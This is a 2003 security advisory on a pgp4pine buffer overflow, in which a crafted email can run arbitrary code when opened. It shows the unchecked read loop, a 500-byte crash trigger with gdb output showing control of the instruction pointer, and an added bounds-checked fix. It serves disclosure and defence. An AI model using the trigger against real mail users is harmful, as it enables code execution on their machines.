pgp4pine.txt
Posted Mar 13, 2003
Authored by Eric AUGE

pgp4pine version 1.76 (and possibly earlier) contains a buffer overflow that allows a specially crafted email to execute arbitrary code on the recipient's machine when the mail is opened.

tags | advisory, overflow, arbitrary
SHA-256 | 71f06463fa52e6c0388b62f1896bae3144178d1a34f4c2fae304885745ea9fc8

The following information:

I Background:
pgp4pine is a mail encryption/decryption/signature/verification wrapper
around gpg for pine. It is called from pine to parse the mail body and
extract the PGP information from the file.

More information: http://pgp4pine.flatline.de/

II Problem description:
When installed and configured within pine, pgp4pine parses every incoming
mail before it is read (in the default configuration), looking for PGP
tokens and information in order to verify the sender's signature.
To verify incoming mail it calls:
menus.c: void fileVerifyDecryptMenu(char *inFile,char *outFile);
and reads each line with this loop:

[...]
char readline[CONSOLE_IO_LINE_LENGTH];
(where defines.h:#define CONSOLE_IO_LINE_LENGTH 256)
[...]
do {
    fertig=0;
    while (!fertig)
    {
        if ((c=getc(fin))==EOF)
        {
            outFile=inFile; /* this usually is not
                               executed, EOF breaks directly */
            return;
        }
        else if ((readline[i++]=c) == '\n')
        {
            readline[i]='\0';
            fertig=1;
        }
    }
    fertig=0;

    if (strncmp("-----BEGIN PGP SIGNED",readline,20)==0)
    {
        /* got signed message */
        fclose(fin);
        while (fileVerify(inFile,outFile) > 0); /* =1: Repeat */
        fertig=1;
    }
    else if (strncmp("-----BEGIN PGP",readline,14)==0)
    {
        /* got another type of PGP message (encrypted, keys ...) */
        fclose(fin);
        fileDecrypt(inFile,outFile);
        waitForReturn();
        fertig=1;
    }
    else
        i=0; /* Got waste line, reset i */
} while (!fertig);
[...]

If a single line runs past 256 characters straight to EOF, it overwrites
the saved environment on the stack and the function returns, because there
is no check on the index 'i' into the readline[] array:

[...]
        }
        else if ((readline[i++]=c) == '\n')
        {
[...]

so a line can grow past CONSOLE_IO_LINE_LENGTH and overwrite the saved
registers before either return condition is reached:

[...]
        if ((c=getc(fin))==EOF)
        {
            outFile=inFile; /* this usually is not
                               executed, EOF breaks directly */
            return;
        }
[...]

Then try:

rival@bones ~/dev/test/pgp4pine-ex $ echo `perl -e 'print "A"x500'` > testmail
rival@bones ~/dev/test/pgp4pine-ex $ ./pgp4pine-vuln -d -i testmail
[...]
Segmentation fault (core dumped)
rival@bones ~/dev/test/pgp4pine-ex $ gdb ./pgp4pine-vuln core
[...]
Core was generated by `./pgp4pine-vuln -d -i testmail'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
#0 0x41414141 in ?? ()
(gdb)

Here it is ;)
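As an added example (not part of the advisory and not pgp4pine's own code), the read loop above rewritten with a bounds check, plus a scanner that applies the same marker dispatch to an in-memory mail body; the use of fmemopen(), the enum names and the status codes are my assumptions.

```c
#define _POSIX_C_SOURCE 200809L /* fmemopen() */
#include <stdio.h>
#include <string.h>

#define CONSOLE_IO_LINE_LENGTH 256 /* same limit as pgp4pine's defines.h */
enum { LINE_OK, LINE_EOF, LINE_TOO_LONG };
enum { PGP_NONE, PGP_SIGNED, PGP_OTHER };

/* Bounded replacement for the advisory's read loop: the index is checked
 * against the buffer capacity before every store, so a line of any length,
 * with or without a trailing newline, can never write past buf[]. */
static int read_line_bounded(FILE *fin, char *buf, size_t buflen)
{
    size_t i = 0;
    int c;
    while ((c = getc(fin)) != EOF) {
        if (i + 1 >= buflen) {            /* no room for this byte plus NUL */
            buf[i] = '\0';
            while (c != '\n' && c != EOF) /* discard the rest of the line */
                c = getc(fin);
            return LINE_TOO_LONG;
        }
        buf[i++] = (char)c;
        if (c == '\n')
            break;
    }
    buf[i] = '\0';
    return (c == EOF && i == 0) ? LINE_EOF : LINE_OK;
}

/* Same dispatch as fileVerifyDecryptMenu(), run over an in-memory mail body:
 * returns the type of the first PGP marker line, or PGP_NONE. Overlong lines
 * are skipped instead of overwriting the saved registers on the stack. */
static int scan_mail(const char *body, size_t len)
{
    char readline[CONSOLE_IO_LINE_LENGTH];
    FILE *fin = fmemopen((void *)body, len, "r");
    int status, kind = PGP_NONE;
    if (fin == NULL)
        return -1;
    while ((status = read_line_bounded(fin, readline, sizeof readline)) != LINE_EOF) {
        if (status == LINE_TOO_LONG)
            continue;                     /* the advisory's 500-byte line lands here */
        if (strncmp("-----BEGIN PGP SIGNED", readline, 20) == 0) { kind = PGP_SIGNED; break; }
        if (strncmp("-----BEGIN PGP", readline, 14) == 0)        { kind = PGP_OTHER;  break; }
    }
    fclose(fin);
    return kind;
}
```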

III Impact
Since pgp4pine processes every incoming email, a specially crafted email
lets its sender execute arbitrary code on the recipient's machine when the
mail is opened.

IV Workaround/Solutions

Deactivate pgp4pine and use another PGP wrapper for pine:
http://pgpenvelope.sourceforge.net/
http://www.megaloman.com/~hany/software/pinepgp/stable.html
or any other.

The author, holger@flatline.de, has been contacted since 01/2003;
no reply so far :/

V Proof of concept
Proof of concept code is attached; for any details, read the source.

Best Regards,

---
Eric AUGE.